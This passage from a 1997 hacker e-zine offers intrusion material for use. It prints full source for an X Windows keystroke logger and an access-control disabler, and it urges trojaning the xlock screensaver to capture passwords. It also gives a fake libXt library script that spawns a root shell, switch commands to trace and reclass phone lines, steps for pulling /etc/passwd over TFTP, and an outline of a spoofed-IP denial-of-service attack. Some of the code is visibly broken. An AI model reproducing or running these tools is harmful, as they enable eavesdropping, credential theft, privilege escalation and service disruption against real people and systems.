LoadCursor(NULL, IDC_ARROW); wndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1); wndClass.lpszClassName = "HELLO"; if (!RegisterClass(&wndClass)) return FALSE; } hwnd = CreateWindow("HELLO", "HELLO" WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL); ShowWindow(hwnd, nCmdShow); UpdateWindow(hwnd); while (GetMessage(&msg, NULL, 0, 0,)) DispatchMessage(&msg); FreeLibrary(hMAPILib); return msg.wParam; } MAPISendMail ^^^^^^^^^^^^ A more flexible and easier way to send a message is thru MAPISendMail With a few simple calls to the API, and 2 structures, you can create a message with a recipent and an actual message. Basically, the following code starts off with creating the structures you need to fill out the message, and it then calls MAPILogin to log on to the MAPI transport protocol ( in this case, SMTP , since it is internet e-mail), it then sends the message, and logs off with MAPILogoff. By the way, this is a simple command line program. mailbill.c ^^^^^^^^^^ // lets mailbill.c (linton) and tell him to get a life #include #include #include LPMAPISENDMAIL lpfnMAPISendMail; LPMAPILOGON lpfnMAPILogon; LPMAPILOGOFF lpfnMAPILogoff; MapiRecipDesc recipent = { 0, MAPI_TO, "Bill Clinton", "SMTP:president@whitehouse.gov", 0, NULL }; MapiMessage message = { 0, "Greetings" "Bill,\n give up your crazy Communications Decency Act, and your Clipper Chip project and come out with your hands up!", NULL, NULL, NULL, 0, NULL, 1, &recipent, 0, NULL }; void main(void) { LHANDLE lhSession; HANDLE hMAPILib; hMAPILib = LoadLibrary("MAPI32.DLL"); lpfnMAPILogon = (LPMAPILOGON)GetProcAddress(hMAPILib, "MAPILogin"); lpfnMAPISendMail = (LPMAPISENDMAIL)GetProcAddress(hMAPILib, "MAPISendMail"); lpfnMAPILogoff = (LPMAPILOGOFF)GetProcAddress(hMAPILib, "MAPILogoff"); (*lpfnMAPILogin)(0,NULL,NULL, MAPI_ALLOW_OTHERS, 0, &lhSession); (*lpfnMAPISendMAil)(lhSession, 0, &message, 0,0); (*lpfnMAPILogoff)(lhSession,0,0,0); printf("Message to the White House is sent.\n"); FreeLibrary(hMAPILib); } This program will work best if you already have your ISP connection going, so start that up first. Oh, and by the way, these are all ment for Visual C++ 4.0, i dont know how well compile, or if they compile under 2.0 or below. Ok, well this is all for this month, next month i will show you a bit more about MAPI, and then i will give you the code to the MAPI Mailbomber, which is what the article is supposed to be all about. _____________________________________________________________ ------------------------------- --=[FCC Frequency Allocations]=-- Written by Keystroke ------------------------------- FREQUENCY RANGE ABBREVIATION CLASSIFICATION 30Hz-300Hz ELF Extremely Low frequency 300Hz-3kHz VF Voice frequency 3kHz-30kHz VLF Very Low frequency 30kHz-300kHz LF Low frequency 300kHz-3MHz MF Medium frequency 3MHz-30MHz HF High frequency 30MHz-300MHz VHF Very high frequency 0.3GHz-3GHz UHF Ultrahigh frequency 3GHz-30GHz SHF Super high frequency 30GHz-300GHz EHF Extremely high frequency 0.3THz-4.29THz IR Infared 4.29THz-6.98THz Visible Light 6.98THz-100THz UV Ultraviolet 100PHz-1000EHz X-rays FREQUENCY (kHz) ALLOCATIONS 300 Marine 400 Aviation 500-1600 AM Radio 2000 Marine, Aviation, and Land Mobil 3000 Amateur, Land Mobile FREQUENCY (MHZ) ALLOCATIONS 3 Marine 4 Marine 5 Land Mobile 6 Marine, Aviation 7 Amatuer, Aviation 8 Land Mobile 9 Marine 10 Marine, Aviation, Shortwave 16 Aviation, Shortwave 20 Aviation, Shortwave 30 Amateur, Land Mobile FREQUENCY (MHZ) ALLOCATIONS 30 Land Mobile, Government 40 Government 50 Government 60 TV Channels 2-4 Broadcast 70 Aviation R/C 80 Land Mobile 90 TV Channels 5-6 Broadcast 100 FM Broadcast 160 Amateur Land Mobile 200 TV Channels 7-13 Broadcast 300 Government Satellite TIP: Put a few scanners around your room, tune them to the same TV station, put your TV on that station, and listen is Surround Sound! :P FREQUENCY (MHZ) ALLOCATIONS 300 Aviation 400 Government Satellite 500 General Mobile Radio Service, Land Mobile 600 TV Channels 14-83 Broadcast 700 TV Channels 14-83 Broadcast 800 Land Mobile 900 Land Mobile 1000 Fixed, Microwaves 1600 Aviation 2000 Fixed 3000 Radar BUGGING FREQUENCIES!!! - http://www.tscm.com/bugfreq.html There's a file at file://oak.oakland.edu/pub/hamradio/docs/misc/fcc.allocations that goes in depth on fcc frequency allocations, the above was a general look at the frequencies. Fun Fact #1: A carrier is really a high-frequency signal that is modulated with a low-frequency information signal. Thats why a modem is a MODulator-DEModulator, it varies the characteristics of high-frequency signal, in accordance with the changes in the info. signal (this is modulation) and retrives the info (low freq.) from the high-frequency modulated carrier signal (this is demodulation). Fun Fact #2: kilobyte, megabyte, gigabyte, terabyte, pentabyte, exabyte _____________________________________________________________ ----------- --=[1aESS]=-- Written by Optimus ----------- I got some badass 1aess shit, this is basically just my notes on it all and some basic need to knows. If it ain't enough for you, you should find something more technical =). I haven't tested any of this, just passing it along... All 1aess commands are typed in caps. Verifacation commands end in '.' and change commands end in '!'. The end of line character is ctrl+d not return, kinda funky, maybe its the keyboard setup they designed. The backspace key is underscore. Basic Commands: WHO-RV-. Shows system info V-STOP-. Clears pause buffer (press space to pause) CI-LIST-. Lists lines currently being traced NET-LINE-XXXXXXX0000. Live Line Trace T-DN-RDXXXXXXX. Returns 1 if line is busy, 0 if idle T-DN-MBXXXXXXX. Forces a line off hook T-DN-MTXXXXXXX. Forces a line on hook OP:CHAN:MON! Shows channels being monitored VFY-DN-30XXXXXXX. Searches for a free fone line VFY-LEN-4100000000. Lists Free LENs VFY-TNN-XXXXXXXX. Shows trunk info Adding lines: RC:LINE:\ Says that you are adding a line ORD 1\ Execute immediatly TN XXXXXXX\ The telephone number of this line LEN XXXXXXXX\ The LEN for the line LCC 1FR\ Line Class Code (List later) XXX YYY\ YYY is the ld company ! Changing a line: RC:LINE;CHG:\ Says that you are changing a line ORD 1\ Execute immediatly TN XXXXXXX\ The line you are changing LCC DTF\ Changes line to a pay phone ! LCC Codes: These are just basic LCC's there are more that I know about, but they seem kind of irrelevant DTF Pay phone 1FR Flat rate 1MR Measured Rate 1PC One Pay Phone PBM No ani? PBX What it says CDF DTF Coin pay phone CFD Coinless charge-a-call pay phone INW InWATTS 800 Removing A Line: RC:LINE;OUT:\ States you are removing a line ORD 1\ Says you want to remove it now TN XXXXXXX\ Number of which you are removing ! Thats basically it, I haven't tested anything so I don't have that much experience with it but, if you do experiment, drop me a ring telling me how it went at rewt@null.net -- Optimus _____________________________________________________________ ------------- --=[X-Toolz]=-- Written by lurk3r ------------- This article is not a basic how-to-use-Xwin or even a step-by-step guide. It's just a few scripts and ideas for those who aren't able to find anything on Xwin and just plain out need a clue. This is also my first article, so bear with me. It can only get better. I did include the xhost command though, because it is such a major function. Basic Command: Enabling the Xhost $ xhost + To allow connections from only a single host for whatever reason, such as to lessen the chances of someone stumbling upon it from just any server, you would use the command.. $ xhost + Recommended: man xwd and man xwud (to find out about dumping screens, very useful) the Xwindows utility. $ xwd -root localhost:0.0 > SaveFile Once you've gotten into the server, poked around and decided that you aren't able to find any way to get root access or other logins, you may want to try some of these ideas out. A good way to start is to run a program such as a key recorder, since xwindows are obviously run on the xserver, then all keystrokes go through it. The first program you may want to setup is xkey.c, written by Dominic Giampaolo (nick@cs.maxine.wpi.edu). To compile type: gcc -o xkey xkey.c -lX11 -lm If that doesn't work then your gonna have to RTFM cause I'm not gonna get into a deep discussion on compiling. To run it type: xkey displayname:0 ------------------------------------------------------------ #include #include #include #include #include #include #include char *TranslateKeyCode(XEvent *ev); Display *d; void snoop_all_windows(Window root, unsigned long type) { static int level = 0; Window parent, *children, *child2; unsigned int nchildren; int stat, i,j,k; level++; stat = XQueryTree(d, root, &root, &parent, &children, &nchildren); if (stat == FALSE) { fprintf(stderr, "Can't query window tree...\n"); return; } if (nchildren == 0) return; /* For a more drastic indication of the problem being exploited * here, you can change these calls to XSelectInput() to something * like XClearWindow(d, children[i]) or if you want to be real * nasty, do XKillWindow(d, children[i]). Of course if you do that, * then you'll want to remove the loop in main(). * * The whole point of this exercise being that I shouldn't be * allowed to manipulate resources which do not belong to me. */ XSelectInput(d, root, type); for(i=0; i < nchildren; i++) { XSelectInput(d, children[i], type); snoop_all_windows(children[i], type); } XFree((char *)children); } void main(int argc, char **argv) { char *hostname; char *string; XEvent xev; int count = 0; if (argv[1] == NULL) hostname = ":0"; else hostname = argv[1]; d = XOpenDisplay(hostname); if (d == NULL) { fprintf(stderr, "Blah, can't open display: %s\n", hostname); exit(10); } snoop_all_windows(DefaultRootWindow(d), KeyPressMask); while(1) { XNextEvent(d, &xev); string = TranslateKeyCode(&xev); if (string == NULL) continue; if (*string == '\r') printf("\n"); else if (strlen(string) == 1) printf("%s", string); else printf("<<%s>>", string); fflush(stdout); } } #define KEY_BUFF_SIZE 256 static char key_buff[KEY_BUFF_SIZE]; char *TranslateKeyCode(XEvent *ev) { int count; char *tmp; KeySym ks; if (ev) { count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL); key_buff[count] = '\0'; if (count == 0) { tmp = XKeysymToString(ks); if (tmp) strcpy(key_buff, tmp); else strcpy(key_buff, ""); } return key_buff; } else return NULL; } ------------------------------------------------------------ Since this is a keystroke recorder and not a sniffer, it can be very helpful in finding out about the system you are on, and possibly getting you into other systems that the user at console connects to, such as FTP sites and other shell acounts. I've noticed that alot of students have multiple shells, and like to check their mail on multiple systems through one account. If you're lucky enough to find one of these guys, you'll be set up for a while. Another useful tool that I have used is called crowbar.c. This program can be used after you have a connection to someones display, and say someone decides to "xhost -" you. This program will allow you to XDisableAccessControl() ------------------------------------------------------ #include #include #include main (int argc, char *argv[]) { Display *dpy; char *dis = NULL; int c; dis= argv[1]; if ((dpy = XOpenDisplay(dis))==NULL){ perror("could not open window"); exit(0); } while ((c=getchar())!='q') XDisableAccessControl(dpy); XCloseDisplay(dpy); } ------------------------------------------------------------ Another program or thought that may be useful, (if you know how to code) would be to install a trojan or trick to get peoples passwords from them. One thing that most people might not think anything about when they sit down at their desk at school or work is when they see a screen saver on. If you've ever been into a place that has lots of computers, even after they have closed for the night you will notice that at least 70% of them are left on with just a screen saver running. So why not edit the GetPassword routine of the screensaver program to capture the passwords that people enter? Anyone seeing the process table won't think twice when they see the screensaver program running. You'll have to go through and edit this yourself, or in the future maybe I or another person in HBS can provide one, but here is the code for the screensaver that I have found to be the most widely used. Xlock.c ------------------------------------------------------------ #include #include #include #include #include "xlock.h" #include #include extern char *crypt(); extern char *getenv(); char *ProgramName; /* argv[0] */ perscreen Scr[MAXSCREENS]; Display *dsp = NULL; /* server display connection */ int screen; /* current screen */ void (*callback) () = NULL; void (*init) () = NULL; static int screens; /* number of screens */ static Window win[MAXSCREENS]; /* window used to cover screen */ static Window icon[MAXSCREENS]; /* window used during password typein */ static Window root[MAXSCREENS]; /* convenience pointer to the root window */ static GC textgc[MAXSCREENS]; /* grphx context used for text rendering */ static long fgcol[MAXSCREENS]; /* used for text rendering */ static long bgcol[MAXSCREENS]; /* background of text screen */ static int iconx[MAXSCREENS]; /* location of left edge of icon */ static int icony[MAXSCREENS]; /* location of top edge of icon */ static Cursor mycursor; /* blank cursor */ static Pixmap lockc; static Pixmap lockm; /* pixmaps for cursor and mask */ static char no_bits[] = {0}; /* dummy array for the blank cursor */ static int passx; /* position of the ?'s */ static int passy; static XFontStruct *font; static int sstimeout; /* screen saver parameters */ static int ssinterval; static int ssblanking; static int ssexposures; #define PASSLENGTH 20 #define FALLBACK_FONTNAME "fixed" #define ICONW 64 #define ICONH 64 #define AllPointerEventMask \ (ButtonPressMask | ButtonReleaseMask | \ EnterWindowMask | LeaveWindowMask | \ PointerMotionMask | PointerMotionHintMask | \ Button1MotionMask | Button2MotionMask | \ Button3MotionMask | Button4MotionMask | \ Button5MotionMask | ButtonMotionMask | \ KeymapStateMask) /* VARARGS1 */ void error(s1, s2) char *s1, *s2; { fprintf(stderr, s1, ProgramName, s2); exit(1); } /* * Server access control support. */ static XHostAddress *XHosts; /* the list of "friendly" client machines */ static int HostAccessCount; /* the number of machines in XHosts */ static Bool HostAccessState; /* whether or not we even look at the list */ static void XGrabHosts(dsp) Display *dsp; { XHosts = XListHosts(dsp, &HostAccessCount, &HostAccessState); if (XHosts) XRemoveHosts(dsp, XHosts, HostAccessCount); XEnableAccessControl(dsp); } static void XUngrabHosts(dsp) Display *dsp; { if (XHosts) { XAddHosts(dsp, XHosts, HostAccessCount); XFree((char *) XHosts); } if (HostAccessState == False) XDisableAccessControl(dsp); } /* * Simple wrapper to get an asynchronous grab on the keyboard and mouse. * If either grab fails, we sleep for one second and try again since some * window manager might have had the mouse grabbed to drive the menu choice * that picked "Lock Screen..". If either one fails the second time we print * an error message and exit. */ static void GrabKeyboardAndMouse() { Status status; status = XGrabKeyboard(dsp, win[0], True, GrabModeAsync, GrabModeAsync, CurrentTime); if (status != GrabSuccess) { sleep(1); status = XGrabKeyboard(dsp, win[0], True, GrabModeAsync, GrabModeAsync, CurrentTime); if (status != GrabSuccess) error("%s: couldn't grab keyboard! (%d)\n", status); } status = XGrabPointer(dsp, win[0], True, AllPointerEventMask, GrabModeAsync, GrabModeAsync, None, mycursor, CurrentTime); if (status != GrabSuccess) { sleep(1); status = XGrabPointer(dsp, win[0], True, AllPointerEventMask, GrabModeAsync, GrabModeAsync, None, mycursor, CurrentTime); if (status != GrabSuccess) error("%s: couldn't grab pointer! (%d)\n", status); } } /* * Assuming that we already have an asynch grab on the pointer, * just grab it again with a new cursor shape and ignore the return code. */ static void XChangeGrabbedCursor(cursor) Cursor cursor; { #ifndef DEBUG (void) XGrabPointer(dsp, win[0], True, AllPointerEventMask, GrabModeAsync, GrabModeAsync, None, cursor, CurrentTime); #endif } /* * Restore all grabs, reset screensaver, restore colormap, close connection. */ static void finish() { XSync(dsp, False); if (!nolock && !allowaccess) XUngrabHosts(dsp); XUngrabPointer(dsp, CurrentTime); XUngrabKeyboard(dsp, CurrentTime); if (!enablesaver) XSetScreenSaver(dsp, sstimeout, ssinterval, ssblanking, ssexposures); XFlush(dsp); XCloseDisplay(dsp); } static int ReadXString(s, slen) char *s; int slen; { XEvent event; char keystr[20]; char c; int i; int bp; int len; int thisscreen = screen; char pwbuf[PASSLENGTH]; for (screen = 0; screen < screens; screen++) if (thisscreen == screen) init(icon[screen]); else init(win[screen]); bp = 0; *s = 0; while (True) { unsigned long lasteventtime = seconds(); while (!XPending(dsp)) { for (screen = 0; screen < screens; screen++) if (thisscreen == screen) callback(icon[screen]); else callback(win[screen]); XFlush(dsp); usleep(delay); if (seconds() - lasteventtime > timeout) { screen = thisscreen; return 1; } } screen = thisscreen; XNextEvent(dsp, &event); switch (event.type) { case KeyPress: len = XLookupString((XKeyEvent *) & event, keystr, 20, NULL, NULL); for (i = 0; i < len; i++) { c = keystr[i]; switch (c) { case 8: /* ^H */ case 127: /* DEL */ if (bp > 0) bp--; break; case 10: /* ^J */ case 13: /* ^M */ s[bp] = '\0'; return 0; case 21: /* ^U */ bp = 0; break; default: s[bp] = c; if (bp < slen - 1) bp++; else XSync(dsp, True); /* flush input buffer */ } } XSetForeground(dsp, Scr[screen].gc, bgcol[screen]); if (echokeys) { memset(pwbuf, '?', slen); XFillRectangle(dsp, win[screen], Scr[screen].gc, passx, passy - font->ascent, XTextWidth(font, pwbuf, slen), font->ascent + font->descent); XDrawString(dsp, win[screen], textgc[screen], passx, passy, pwbuf, bp); } /* * eat all events if there are more than enough pending... this * keeps the Xlib event buffer from growing larger than all * available memory and crashing xlock. */ if (XPending(dsp) > 100) { /* 100 is arbitrarily big enough */ register Status status; do { status = XCheckMaskEvent(dsp, KeyPressMask | KeyReleaseMask, &event); } while (status); XBell(dsp, 100); } break; case ButtonPress: if (((XButtonEvent *) & event)->window == icon[screen]) { return 1; } break; case VisibilityNotify: if (event.xvisibility.state != VisibilityUnobscured) { #ifndef DEBUG XRaiseWindow(dsp, win[screen]); #endif s[0] = '\0'; return 1; } break; case KeymapNotify: case KeyRelease: case ButtonRelease: case MotionNotify: case LeaveNotify: case EnterNotify: break; default: fprintf(stderr, "%s: unexpected event: %d\n", ProgramName, event.type); break; } } } static int getPassword() { char buffer[PASSLENGTH]; char userpass[PASSLENGTH]; char rootpass[PASSLENGTH]; char *user; XWindowAttributes xgwa; int y, left, done; struct passwd *pw; pw = getpwnam("root"); strcpy(rootpass, pw->pw_passwd); pw = getpwnam(cuserid(NULL)); strcpy(userpass, pw->pw_passwd); user = pw->pw_name; XGetWindowAttributes(dsp, win[screen], &xgwa); XChangeGrabbedCursor(XCreateFontCursor(dsp, XC_left_ptr)); XSetForeground(dsp, Scr[screen].gc, bgcol[screen]); XFillRectangle(dsp, win[screen], Scr[screen].gc, 0, 0, xgwa.width, xgwa.height); XMapWindow(dsp, icon[screen]); XRaiseWindow(dsp, icon[screen]); left = iconx[screen] + ICONW + font->max_bounds.width; y = icony[screen] + font->ascent; XDrawString(dsp, win[screen], textgc[screen], left, y, text_name, strlen(text_name)); XDrawString(dsp, win[screen], textgc[screen], left + 1, y, text_name, strlen(text_name)); XDrawString(dsp, win[screen], textgc[screen], left + XTextWidth(font, text_name, strlen(text_name)), y, user, strlen(user)); y += font->ascent + font->descent + 2; XDrawString(dsp, win[screen], textgc[screen], left, y, text_pass, strlen(text_pass)); XDrawString(dsp, win[screen], textgc[screen], left + 1, y, text_pass, strlen(text_pass)); passx = left + 1 + XTextWidth(font, text_pass, strlen(text_pass)) + XTextWidth(font, " ", 1); passy = y; y = icony[screen] + ICONH + font->ascent + 2; XDrawString(dsp, win[screen], textgc[screen], iconx[screen], y, text_info, strlen(text_info)); XFlush(dsp); y += font->ascent + font->descent + 2; done = False; while (!done) { if (ReadXString(buffer, PASSLENGTH)) break; /* * we don't allow for root to have no password, but we handle the case * where the user has no password correctly; they have to hit return * only */ done = !((strcmp(crypt(buffer, userpass), userpass)) && (!allowroot || strcmp(crypt(buffer, rootpass), rootpass))); if (!done && *buffer == NULL) { /* just hit return, and it wasn't his password */ break; } if (*userpass == NULL && *buffer != NULL) { /* * the user has no password, but something was typed anyway. * sounds fishy: don't let him in... */ done = False; } /* clear plaintext password so you can't grunge around /dev/kmem */ memset(buffer, 0, sizeof(buffer)); XSetForeground(dsp, Scr[screen].gc, bgcol[screen]); XFillRectangle(dsp, win[screen], Scr[screen].gc, iconx[screen], y - font->ascent, XTextWidth(font, text_invalid, strlen(text_invalid)), font->ascent + font->descent + 2); XDrawString(dsp, win[screen], textgc[screen], iconx[screen], y, text_valid, strlen(text_valid)); if (done) return 0; else { XSync(dsp, True); /* flush input buffer */ sleep(1); XFillRectangle(dsp, win[screen], Scr[screen].gc, iconx[screen], y - font->ascent, XTextWidth(font, text_valid, strlen(text_valid)), font->ascent + font->descent + 2); XDrawString(dsp, win[screen], textgc[screen], iconx[screen], y, text_invalid, strlen(text_invalid)); if (echokeys) /* erase old echo */ XFillRectangle(dsp, win[screen], Scr[screen].gc, passx, passy - font->ascent, xgwa.width - passx, font->ascent + font->descent); } } XChangeGrabbedCursor(mycursor); XUnmapWindow(dsp, icon[screen]); return 1; } static void justDisplay() { XEvent event; for (screen = 0; screen < screens; screen++) init(win[screen]); do { while (!XPending(dsp)) { for (screen = 0; screen < screens; screen++) callback(win[screen]); XFlush(dsp); usleep(delay); } XNextEvent(dsp, &event); #ifndef DEBUG if (event.type == VisibilityNotify) XRaiseWindow(dsp, event.xany.window); #endif } while (event.type != ButtonPress && event.type != KeyPress); for (screen = 0; screen < screens; screen++) if (event.xbutton.root == RootWindow(dsp, screen)) break; if (usefirst) XPutBackEvent(dsp, &event); } static void sigcatch() { finish(); error("%s: caught terminate signal.\nAccess control list restored.\n"); } static void lockDisplay() { if (!allowaccess) { #ifdef SYSV sigset_t oldsigmask; sigset_t newsigmask; sigemptyset(&newsigmask); sigaddset(&newsigmask, SIGHUP); sigaddset(&newsigmask, SIGINT); sigaddset(&newsigmask, SIGQUIT); sigaddset(&newsigmask, SIGTERM); sigprocmask(SIG_BLOCK, &newsigmask, &oldsigmask); #else int oldsigmask; oldsigmask = sigblock(sigmask(SIGHUP) | sigmask(SIGINT) | sigmask(SIGQUIT) | sigmask(SIGTERM)); #endif signal(SIGHUP, (void (*) ()) sigcatch); signal(SIGINT, (void (*) ()) sigcatch); signal(SIGQUIT, (void (*) ()) sigcatch); signal(SIGTERM, (void (*) ()) sigcatch); XGrabHosts(dsp); #ifdef SYSV sigprocmask(SIG_SETMASK, &oldsigmask, &oldsigmask); #else sigsetmask(oldsigmask); #endif } do { justDisplay(); } while (getPassword()); } long allocpixel(cmap, name, def) Colormap cmap; char *name; char *def; { XColor col; XColor tmp; XParseColor(dsp, cmap, name, &col); if (!XAllocColor(dsp, cmap, &col)) { fprintf(stderr, "couldn't allocate: %s, using %s instead\n", name, def); XAllocNamedColor(dsp, cmap, def, &col, &tmp); } return col.pixel; } int main(argc, argv) int argc; char *argv[]; { XSetWindowAttributes xswa; XGCValues xgcv; XColor nullcolor; ProgramName = strrchr(argv[0], '/'); if (ProgramName) ProgramName++; else ProgramName = argv[0]; srandom(time((long *) 0)); /* random mode needs the seed set. */ GetResources(argc, argv); CheckResources(); font = XLoadQueryFont(dsp, fontname); if (font == NULL) { fprintf(stderr, "%s: can't find font: %s, using %s...\n", ProgramName, fontname, FALLBACK_FONTNAME); font = XLoadQueryFont(dsp, FALLBACK_FONTNAME); if (font == NULL) error("%s: can't even find %s!!!\n", FALLBACK_FONTNAME); } screens = ScreenCount(dsp); if (screens > MAXSCREENS) error("%s: can only support %d screens.\n", MAXSCREENS); for (screen = 0; screen < screens; screen++) { Screen *scr = ScreenOfDisplay(dsp, screen); Colormap cmap = DefaultColormapOfScreen(scr); root[screen] = RootWindowOfScreen(scr); bgcol[screen] = allocpixel(cmap, background, "White"); fgcol[screen] = allocpixel(cmap, foreground, "Black"); if (mono || CellsOfScreen(scr) == 2) { Scr[screen].pixels[0] = fgcol[screen]; Scr[screen].pixels[1] = bgcol[screen]; Scr[screen].npixels = 2; } else { int colorcount = NUMCOLORS; u_char red[NUMCOLORS]; u_char green[NUMCOLORS]; u_char blue[NUMCOLORS]; int i; hsbramp(0.0, saturation, 1.0, 1.0, saturation, 1.0, colorcount, red, green, blue); Scr[screen].npixels = 0; for (i = 0; i < colorcount; i++) { XColor xcolor; xcolor.red = red[i] << 8; xcolor.green = green[i] << 8; xcolor.blue = blue[i] << 8; xcolor.flags = DoRed | DoGreen | DoBlue; if (!XAllocColor(dsp, cmap, &xcolor)) break; Scr[screen].pixels[i] = xcolor.pixel; Scr[screen].npixels++; } if (verbose) fprintf(stderr, "%d pixels allocated\n", Scr[screen].npixels); } xswa.override_redirect = True; xswa.background_pixel = BlackPixelOfScreen(scr); xswa.event_mask = KeyPressMask | ButtonPressMask | VisibilityChangeMask; #ifdef DEBUG #define WIDTH WidthOfScreen(scr) - 100 #define HEIGHT HeightOfScreen(scr) - 100 #define CWMASK CWBackPixel | CWEventMask #else #define WIDTH WidthOfScreen(scr) #define HEIGHT HeightOfScreen(scr) #define CWMASK CWOverrideRedirect | CWBackPixel | CWEventMask #endif win[screen] = XCreateWindow(dsp, root[screen], 0, 0, WIDTH, HEIGHT, 0, CopyFromParent, InputOutput, CopyFromParent, CWMASK, &xswa); #ifdef DEBUG { XWMHints xwmh; xwmh.flags = InputHint; xwmh.input = True; XChangeProperty(dsp, win[screen], XA_WM_HINTS, XA_WM_HINTS, 32, PropModeReplace, (unsigned char *) &xwmh, sizeof(xwmh) / sizeof(int)); } #endif iconx[screen] = (DisplayWidth(dsp, screen) - XTextWidth(font, text_info, strlen(text_info))) / 2; icony[screen] = DisplayHeight(dsp, screen) / 6; xswa.border_pixel = fgcol[screen]; xswa.background_pixel = bgcol[screen]; xswa.event_mask = ButtonPressMask; #define CIMASK CWBorderPixel | CWBackPixel | CWEventMask icon[screen] = XCreateWindow(dsp, win[screen], iconx[screen], icony[screen], ICONW, ICONH, 1, CopyFromParent, InputOutput, CopyFromParent, CIMASK, &xswa); XMapWindow(dsp, win[screen]); XRaiseWindow(dsp, win[screen]); xgcv.foreground = WhitePixelOfScreen(scr); xgcv.background = BlackPixelOfScreen(scr); Scr[screen].gc = XCreateGC(dsp, win[screen], GCForeground | GCBackground, &xgcv); xgcv.foreground = fgcol[screen]; xgcv.background = bgcol[screen]; xgcv.font = font->fid; textgc[screen] = XCreateGC(dsp, win[screen], GCFont | GCForeground | GCBackground, &xgcv); } lockc = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1); lockm = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1); mycursor = XCreatePixmapCursor(dsp, lockc, lockm, &nullcolor, &nullcolor, 0, 0); XFreePixmap(dsp, lockc); XFreePixmap(dsp, lockm); if (!enablesaver) { XGetScreenSaver(dsp, &sstimeout, &ssinterval, &ssblanking, &ssexposures); XSetScreenSaver(dsp, 0, 0, 0, 0); /* disable screen saver */ } #ifndef DEBUG GrabKeyboardAndMouse(); #endif nice(nicelevel); if (nolock) justDisplay(); else lockDisplay(); finish(); return 0; } ------------------------------------------------------------ I've also provided one small code for an example of a lib-x hack. ------------------------------------------------------------ #!/bin/sh mkdir /tmp/.werd cd /tmp/.werd cat << _EOF_ > Initialize.c _XtAppInitialize() { setuid(0); execl("/bin/sh", "sh", 0); } XtAppSetFallbackResources() {} _XtDisplayInitialize() {} _EOF_ ar x /usr/lib/libXt.a cc -c -pic Initialize.c ld *.o mkdir lib lib/X mv a.out lib/X/libXt.so.4.1 cd lib/X echo "git reddy for da fun, du0dz" xterm ------------------------------------------------------------ theLURK3R - http://home.earthlink.net/~rseal/index.htm Personal Greetz: Channels: #Virii #Phreak #Hackers People: Hibislea FA-Q Darcangel ICBM _RefluX_ Wrd btm Scud-O memor _____________________________________________________________ ©1997 HAVOC Bell Systems Publishing No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. THTJ is all natural, contains no preservatives, and absolutely no lead. Do not read THTJ while operating heavy machinery. Do not give THTJ to your favorite operator. Do not pass go. Do not collect $200. Smoking THTJ may cause cancer. Plagiarizing this publication is a crime against humanity. _____________________________________________________________ ---------- --=[TFTP]=-- Written by Scud-O ---------- [TFTP: Weaknesses and Exploits] What follows is nether a new exploit or a big one. It is simply a small program with holes that are often overlooked, since it is needed for many purposes on a UNIX system. What the hell is it? ^^^^^^^^^^^^^^^^^^^^ TFTP stands for Trival File Transfer Protocol. It is a very simple file protocol, and it does not have error checking. It is different from FTP in two main ways. First, it does not log in to the machine it is remotely getting files from, and Second, it uses UDP ( User Datagram Protocol ) not TCP. TFTP uses the standard port 69 even though TCP is not used. TFTP is not used very much , since FTP has more features, and error control. However, TFTP is often used on diskless workstations and embedded systems. Since TFTP does not have to use the OS, it can be installed on a tiny EPROM with UDP and a network driver. Ok, So What? ^^^^^^^^^^^^ Well, since TFTP uses UDP, no logins are made, and if the sysadmin has not plugged up tftp or tftpd, then you practically have root, since you can get any file you wish! While many systems are still open to tftp, many sites have started to plug up tftp, or even ban connections to it, since security releases are starting to come out about its holes. Anyway, since tftp can both get AND send files, you can first get the sites /etc/passwd, and then upload the new one you added with your new account that you of course added to the file. However, as far as i know, this is a limited attack, since tftpd seems to be set up with a default to not get files, only to put files. But you can still get the file and try to crack it. [^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] [ TFTP Command Set ] [-------------------------------------------------] binary Uses binary mode for transfers connect Connect to server get Get file put Put file trace Displays protocol codes verbose Displays all information NOTE: There are 3 modes of transfer available for TFTP to use: o NetASCII: Standard ASCII, default transfer o Byte : 8-bit bytes and binary (remember typing in binary?) o Mail : Indicates destination is a user not a file, info is transfered as NetASCII. [An Example TFTP Session] limbo~#: tftp tftp> connect smarty.smart.net tftp> trace Packet tracing on. tftp> verbose Verbose mode on. tftp> status Connected to smarty.smart.net Mode: octet Verbose: on Tracing: on Rexmt-interval: 5 seconds, Max-timeout: 25 seconds ftfp> get /etc/passwd (or what ever file you want) getting from smarty.smart.net:/etc/passwd to /tmp/passwd [octet] sent RRQ received DATA send ACK received DATA send ACK received DATA send ACK Received 1472 bytes in 0.2 seconds 46080 bits/s tftp> quit limbo~#: So basically, this is what a typically tftp transfer looks like, with most of the options enabled. Now, dont try this at home, since smart.net's tftp now only spits out a time out error message when you try this. ( well, you can try it if you like, but it is pretty much pointless, since you will only get the error.) [TFTP Packets] Well, since TFTP uses UDP as its transport protocol, TFTP uses the UDP header to encapsulate TFTP protocol information. It uses UDP's source and destination ports to set the connection up, and it accomplishes this by the use of TFTP Transfer Identifiers, AKA TIDs, which then places all this stuff in the headers. Anyway, TFTP uses 5 types of Protocol Data Units, and they are: RRQ and WRQ: [ Opcode ][ Filename ][0][ Mode ][0] ( 2 bytes) (String) (String) DATA : [ Opcode ][ Block Number][0] ( 2 bytes) ( 2 bytes) ACK : [ Opcode ][ Block Number] ( 2 bytes) ( 2 bytes) Error : [ Opcode ][ Block Number][Error Message][0] ( 2 bytes) ( 2 bytes) (String) TFTP Opcodes: ACK 4 Acknowledgment DATA 3 Send Data Error 5 Error RRQ 1 Read request WRQ 2 Write request Ok, So what the hell do I need to know all about the TFTP protocol for? ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Well , its very simple, with this information, you have all you will need to contruct yet another Denial of Service attack. Write a simple C program that basically uses one of those easily found IP Spoofers, and then add a system() call to tftp and ask it to get an odd file, that probably doesnt exist, such as, well, etc/this.file.doesnt.exist , for example. Then when the server is trying to reply with an error to a non-existant server, you will be quickly slowing the remote system to a halt. ( hell, i have an experiment, i am probably going to write this code out ( i 